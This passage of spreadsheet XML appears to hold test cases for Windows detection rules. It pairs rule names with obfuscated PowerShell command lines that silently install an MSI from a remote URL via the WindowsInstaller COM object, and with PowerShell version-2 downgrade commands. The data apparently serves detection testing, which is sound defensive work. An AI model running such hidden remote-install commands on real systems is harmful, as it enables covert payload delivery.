      <c r="I431" s="43" t="n"/>
      <c r="J431" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K431" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="432" ht="15.75" customHeight="1" s="42">
      <c r="A432" s="43" t="n"/>
      <c r="B432" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C432" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D432" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E432" s="4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2" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G432" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H432" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I432" s="43" t="n"/>
      <c r="J432" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K432" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="433" ht="15.75" customHeight="1" s="42">
      <c r="A433" s="43" t="n"/>
      <c r="B433" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C433" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D433" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E433" s="4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3" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G433" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H433" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I433" s="43" t="n"/>
      <c r="J433" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K433" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="434" ht="15.75" customHeight="1" s="42">
      <c r="A434" s="43" t="n"/>
      <c r="B434" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C434" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D434" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E434" s="4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4" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G434" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H434" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I434" s="43" t="n"/>
      <c r="J434" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K434" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="435" ht="15.75" customHeight="1" s="42">
      <c r="A435" s="43" t="n"/>
      <c r="B435" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C435" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D435" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E435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5" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G435" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H435" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I435" s="43" t="n"/>
      <c r="J435" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K435" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="436" ht="15.75" customHeight="1" s="42">
      <c r="A436" s="43" t="n"/>
      <c r="B436" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C436" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D436" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E436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6" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G436" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H436" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I436" s="43" t="n"/>
      <c r="J436" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K436" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="437" ht="15.75" customHeight="1" s="42">
      <c r="A437" s="43" t="n"/>
      <c r="B437" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C437" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D437" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E437" s="4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437" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G437" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H437" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I437" s="43" t="n"/>
      <c r="J437" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K437" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="438" ht="15.75" customHeight="1" s="42">
      <c r="A438" s="43" t="n"/>
      <c r="B438" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C438" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D438" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E438" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"WindowStyle" Hidden -COMmanD "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F438" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G438" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H438" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I438" s="43" t="n"/>
      <c r="J438" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K438" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="439" ht="15.75" customHeight="1" s="42">
      <c r="A439" s="43" t="n"/>
      <c r="B439" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C439" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D439" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E439" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"WindowStyle" Hidden -c "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F439" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G439" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H439" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I439" s="43" t="n"/>
      <c r="J439" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K439" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="440" ht="15.75" customHeight="1" s="42">
      <c r="A440" s="43" t="n"/>
      <c r="B440" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C440" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D440" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E440" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"WindowStyle" Hidden -"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F440" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G440" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H440" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I440" s="43" t="n"/>
      <c r="J440" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K440" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="441" ht="15.75" customHeight="1" s="42">
      <c r="A441" s="43" t="n"/>
      <c r="B441" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C441" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D441" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E441" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -wiNDowStyLe Hidden /"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F441" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G441" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H441" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I441" s="43" t="n"/>
      <c r="J441" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K441" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="442" ht="15.75" customHeight="1" s="42">
      <c r="A442" s="43" t="n"/>
      <c r="B442" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C442" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D442" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E442" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -WiNDOwSTYlE Hidden -"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F442" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G442" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H442" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I442" s="44" t="n"/>
      <c r="J442" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K442" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="443" ht="15.75" customHeight="1" s="42">
      <c r="A443" s="43" t="n"/>
      <c r="B443" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C443" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D443" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E443" s="4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443" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G443" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H443" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I443" s="43" t="n"/>
      <c r="J443" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K443" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="444" ht="15.75" customHeight="1" s="42">
      <c r="A444" s="43" t="n"/>
      <c r="B444" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C444" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D444" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E444" s="44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444" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G444" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H444" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I444" s="43" t="n"/>
      <c r="J444" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K444" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="445" ht="15.75" customHeight="1" s="42">
      <c r="A445" s="43" t="n"/>
      <c r="B445" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C445" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D445" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E445" s="44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445" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G445" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H445" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I445" s="43" t="n"/>
      <c r="J445" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K445" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="446" ht="15.75" customHeight="1" s="42">
      <c r="A446" s="43" t="n"/>
      <c r="B446" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C446" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D446" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E446" s="44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446" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G446" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H446" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I446" s="43" t="n"/>
      <c r="J446" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K446" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="447" ht="15.75" customHeight="1" s="42">
      <c r="A447" s="43" t="n"/>
      <c r="B447" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C447" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D447" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E447" s="44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447" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G447" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H447" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I447" s="43" t="n"/>
      <c r="J447" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K447" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="448" ht="15.75" customHeight="1" s="42">
      <c r="A448" s="43" t="n"/>
      <c r="B448" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C448" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D448" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E448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48" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G448" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H448" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I448" s="43" t="n"/>
      <c r="J448" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K448" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="449" ht="15.75" customHeight="1" s="42">
      <c r="A449" s="43" t="n"/>
      <c r="B449" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C449" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D449" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E449" s="4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449" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G449" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H449" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I449" s="43" t="n"/>
      <c r="J449" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K449" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="450" ht="15.75" customHeight="1" s="42">
      <c r="A450" s="43" t="n"/>
      <c r="B450" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C450" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D450" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E450" s="4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450" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G450" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H450" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I450" s="43" t="n"/>
      <c r="J450" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K450" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="451" ht="15.75" customHeight="1" s="42">
      <c r="A451" s="43" t="n"/>
      <c r="B451" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C451" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D451" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E451" s="4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451" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G451" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H451" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I451" s="43" t="n"/>
      <c r="J451" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K451" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="452" ht="15.75" customHeight="1" s="42">
      <c r="A452" s="43" t="n"/>
      <c r="B452" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C452" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D452" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E452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52" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G452" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H452" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I452" s="43" t="n"/>
      <c r="J452" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K452" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="453" ht="15.75" customHeight="1" s="42">
      <c r="A453" s="43" t="n"/>
      <c r="B453" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C453" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D453" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E453" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F453" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G453" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H453" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I453" s="43" t="n"/>
      <c r="J453" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K453" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="454" ht="15.75" customHeight="1" s="42">
      <c r="A454" s="43" t="n"/>
      <c r="B454" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C454" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D454" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E454" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F454" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G454" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H454" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I454" s="44" t="n"/>
      <c r="J454" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K454" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="455" ht="15.75" customHeight="1" s="42">
      <c r="A455" s="43" t="n"/>
      <c r="B455" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C455" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D455" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E455" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"v" 2-Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F455" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G455" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H455" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I455" s="44" t="n"/>
      <c r="J455" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K455" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="456" ht="15.75" customHeight="1" s="42">
      <c r="A456" s="43" t="n"/>
      <c r="B456" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C456" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D456" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E456" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -v 2.0 -"Command" "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F456" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G456" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H456" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I456" s="44" t="n"/>
      <c r="J456" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K456" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="457" ht="15.75" customHeight="1" s="42">
      <c r="A457" s="43" t="n"/>
      <c r="B457" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C457" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D457" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E457" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -v 2.0 /"Command" "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F457" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G457" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H457" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I457" s="43" t="n"/>
      <c r="J457" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K457" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="458" ht="15.75" customHeight="1" s="42">
      <c r="A458" s="43" t="n"/>
      <c r="B458" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C458" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D458" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E458" s="4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458" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G458" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H458" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I458" s="43" t="n"/>
      <c r="J458" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K458" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="459" ht="15.75" customHeight="1" s="42">
      <c r="A459" s="43" t="n"/>
      <c r="B459" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C459" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D459" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E459" s="4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459" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G459" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H459" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I459" s="44" t="n"/>
      <c r="J459" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K459" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="460" ht="15.75" customHeight="1" s="42">
      <c r="A460" s="43" t="n"/>
      <c r="B460" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C460" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D460" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E460" s="44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F460" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G460" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H460" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I460" s="43" t="n"/>
      <c r="J460" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K460" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="461" ht="15.75" customHeight="1" s="42">
      <c r="A461" s="43" t="n"/>
      <c r="B461" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C461" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D461" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E461" s="4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F461" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G461" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H461" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I461" s="43" t="n"/>
      <c r="J461" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K461" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="462" ht="15.75" customHeight="1" s="42">
      <c r="A462" s="43" t="n"/>
      <c r="B462" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C462" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D462" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E462" s="4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F462" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G462" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H462" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I462" s="43" t="n"/>
      <c r="J462" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K462" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="463" ht="15.75" customHeight="1" s="42">
      <c r="A463" s="43" t="n"/>
      <c r="B463" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C463" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D463" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E463" s="44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F463" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G463" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H463" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I463" s="43" t="n"/>
      <c r="J463" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K463" s="44" t="b">
        <v>0</v>
      </c>
    </row>
